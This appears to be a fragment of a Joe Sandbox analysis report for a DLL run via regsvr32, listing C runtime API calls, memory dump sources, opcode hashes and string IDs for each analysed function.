                                                                                                                              • Part of subcall function 00007FFC66D73024: HeapFree.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7303A
                                                                                                                              • Part of subcall function 00007FFC66D73024: _errno.LIBCMT ref: 00007FFC66D73044
                                                                                                                              • Part of subcall function 00007FFC66D73024: GetLastError.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7304C
                                                                                                                            • _lock.LIBCMT ref: 00007FFC66D74DB7
                                                                                                                            • free.LIBCMT ref: 00007FFC66D74E67
                                                                                                                            • free.LIBCMT ref: 00007FFC66D74E97
                                                                                                                            • _errno.LIBCMT ref: 00007FFC66D74E9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1264244385-0
                                                                                                                            • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                            • Instruction ID: a231bb5146861535203fbede5ff38896b3d61c6f9ffac476dbd58eecd5af0ec8
                                                                                                                            • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                            • Instruction Fuzzy Hash: 8B51B331A0C6AAC2E759DB659400279FB91FB84B64F144136D6DE8B395CF3CE441EB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 502529563-0
                                                                                                                            • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                            • Instruction ID: c97bd2dc55c5f23268d77a34c68e05f293ddc02fa9dee2bb57ae8e49c00694b4
                                                                                                                            • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                            • Instruction Fuzzy Hash: 7E114F20F0C6AAD1FE185B62A90027DBE50DF84B91F044534E99D4E7C2EE2CE440EF32
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                            • String ID: vb4vcW2kAW3Twaz?30
                                                                                                                            • API String ID: 254689257-4179232793
                                                                                                                            • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                            • Instruction ID: 83e090c5c4e15cf7a937d112a4e20bafd084a38eb65a99858f8f76044cfa92c3
                                                                                                                            • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                            • Instruction Fuzzy Hash: 5821F63260CE9AC6E3388B14E4583EAB7A5FB88748F044539C6CD8B765DF7DA501EB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FFC66D736F0: _initp_misc_winsig.LIBCMT ref: 00007FFC66D73729
                                                                                                                              • Part of subcall function 00007FFC66D736F0: EncodePointer.KERNEL32(?,?,?,00007FFC66D72FAB,?,?,?,00007FFC66D72179), ref: 00007FFC66D73745
                                                                                                                            • FlsAlloc.KERNEL32(?,?,?,00007FFC66D72179), ref: 00007FFC66D72FBB
                                                                                                                              • Part of subcall function 00007FFC66D73108: Sleep.KERNEL32(?,?,0000000A,00007FFC66D72DA3,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7314D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFC66D72179), ref: 00007FFC66D72FEC
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00007FFC66D73000
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 54287522-0
                                                                                                                            • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                            • Instruction ID: 7fc10bcc3d4d5bfbf8c144d917df4700e22ed66aab950061deee5b8837f4f385
                                                                                                                            • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                            • Instruction Fuzzy Hash: 1E014420E0C56BC1F75CAB72980927CAAA15F04724F140234C5AD8E3D5EE2CA845FA72
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 523 7ffc66d72050-7ffc66d7207f call 7ffc66d31000 ExitProcess
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess
                                                                                                                            • String ID: JKvDDasqwOPvGXZdqW
                                                                                                                            • API String ID: 621844428-4059861069
                                                                                                                            • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                            • Instruction ID: e7e8c16dd5028d6375726fb45fe65539249243892c90615899f8807b01613b4b
                                                                                                                            • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                            • Instruction Fuzzy Hash: DCD0C721A1CB97C1D6249710F84935A73A4FB89354FC00134D5CC4A714DF7CD155DF14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _errno.LIBCMT ref: 00007FFC66D76D0F
                                                                                                                              • Part of subcall function 00007FFC66D766D8: DecodePointer.KERNEL32 ref: 00007FFC66D766FF
                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFC66D7313B,?,?,0000000A,00007FFC66D72DA3,?,?,?,00007FFC66D72DFF), ref: 00007FFC66D76D58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 15861996-0
                                                                                                                            • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                            • Instruction ID: 8b11b0b7e9a8ccf000168796d56afa5e1e0afeaaf5bccdc2d048e5ed214a4d69
                                                                                                                            • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                            • Instruction Fuzzy Hash: DF11C821B1C2AAC5FB1C4B26D60437DEA919FC07D4F284934CE9D0E6C4EE6CA400DE26
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _initp_misc_winsig.LIBCMT ref: 00007FFC66D73729
                                                                                                                              • Part of subcall function 00007FFC66D7755C: EncodePointer.KERNEL32(?,?,?,?,00007FFC66D7373E,?,?,?,00007FFC66D72FAB,?,?,?,00007FFC66D72179), ref: 00007FFC66D77567
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00007FFC66D72FAB,?,?,?,00007FFC66D72179), ref: 00007FFC66D73745
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190222155-0
                                                                                                                            • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                            • Instruction ID: e5ba1556b40bb3de10b628518d75084e42c9aabdf714eb74f6ba0958586d1748
                                                                                                                            • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                            • Instruction Fuzzy Hash: C9F09800E8C26F90E90DBB6238620BC9A408F96781F581474E88E4E393DD2CF541EB76
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CreateInformation
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1774340351-0
                                                                                                                            • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                            • Instruction ID: a74c003555c2b0fa2358b8a38db62a80287cbb1822681fc72b9c33ab32b95cb9
                                                                                                                            • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                            • Instruction Fuzzy Hash: CFE04F75F297A1C2E79D9B21A80AB696690FB88740F90503DEA8D02794DF3DD145CF10
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00007FFC66D734AF,?,?,?,00007FFC66D721CB), ref: 00007FFC66D7740D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                            • Instruction ID: 17210557fa6291f50ea71fc2a8f3b6b2d03ce643b61ec37cde6a17cdef1c3272
                                                                                                                            • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                            • Instruction Fuzzy Hash: D7D02B33F1C585C1DF148B22F48016C6760EB84798F688030D68C0B305DD3CC456CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(?,?,0000000A,00007FFC66D72DA3,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7314D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1068366078-0
                                                                                                                            • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                            • Instruction ID: a14efbaeefa26e9372948424c7d9828ceefd5b1c0ac9451e2eebc4f9c790aa06
                                                                                                                            • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                            • Instruction Fuzzy Hash: 0A01A733B18B95C5EB488B16980002DBB61F784FD0F090135DEAD0BB50DF38E851DB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FFC66D76C34: _FF_MSGBANNER.LIBCMT ref: 00007FFC66D76C64
                                                                                                                              • Part of subcall function 00007FFC66D76C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC66D730C0,?,?,00000000,00007FFC66D76B19,?,?,00000000,00007FFC66D76BC3), ref: 00007FFC66D76C89
                                                                                                                              • Part of subcall function 00007FFC66D76C34: _errno.LIBCMT ref: 00007FFC66D76CAD
                                                                                                                              • Part of subcall function 00007FFC66D76C34: _errno.LIBCMT ref: 00007FFC66D76CB8
                                                                                                                            • Sleep.KERNEL32(?,?,00000000,00007FFC66D76B19,?,?,00000000,00007FFC66D76BC3,?,?,?,?,?,?,00000000,00007FFC66D72DC8), ref: 00007FFC66D730D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$AllocateHeapSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4153772858-0
                                                                                                                            • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                            • Instruction ID: e36c0966c115ee10b7d81ec024aa9eb32f3ce1dc0a149acd17b9bc749c3daa19
                                                                                                                            • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                            • Instruction Fuzzy Hash: D7F0A432A0D79AC2EA589F16A44003DB660FB84B90F450138EA9D0BB55DF3CE891DB01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1446610345-0
                                                                                                                            • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                            • Instruction ID: 5448aaf410cf82164e612de5aba8cb90d171bf5f572838712369607eff6dca14
                                                                                                                            • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                            • Instruction Fuzzy Hash: 67F12632A0C6A9DAE7288F25D4005B9BB91FB44B98F144235EA9D4FBD4DF3CE940DB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                                                                            • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                            • API String ID: 1558914745-1064046199
                                                                                                                            • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                            • Instruction ID: 98cc3fb8cfab930b9dfbe7b791740bf88652b7e8e9075697b5cfa84f59fd1ba8
                                                                                                                            • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                            • Instruction Fuzzy Hash: 2931B725E0D7AAC2FB18AB22A41527DA6D09F48785F544438DE8D4F785EE3CF404EF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                            • String ID: Norwegian-Nynorsk
                                                                                                                            • API String ID: 2273835618-461349085
                                                                                                                            • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                            • Instruction ID: aa3a1560bf1f3c040b705573327da4c69c6602aac07006a31624341832e0d372
                                                                                                                            • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                            • Instruction Fuzzy Hash: 9D615362A0C666CEFB6C9F21D4057796B90EF44B44F084136DA8D4A3D4DF3CE940EB66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FormatTime$__ascii_stricmpfree
                                                                                                                            • String ID: a/p$am/pm
                                                                                                                            • API String ID: 2252689280-3206640213
                                                                                                                            • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                            • Instruction ID: 92893f5a909d947d051add29b40bf2888934fbae24162475b1de02059c11d700
                                                                                                                            • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                            • Instruction Fuzzy Hash: EAF1D62291C6BAC5E77C9F24849457CAF61FB04784F449036EADD4FAC5DE3CA844EB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC66D77194,?,?,?,?,00007FFC66D76C69,?,?,00000000,00007FFC66D730C0), ref: 00007FFC66D76FCF
                                                                                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFC66D77194,?,?,?,?,00007FFC66D76C69,?,?,00000000,00007FFC66D730C0), ref: 00007FFC66D770DB
                                                                                                                            • WriteFile.KERNEL32 ref: 00007FFC66D77115
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                            • API String ID: 3784150691-4022980321
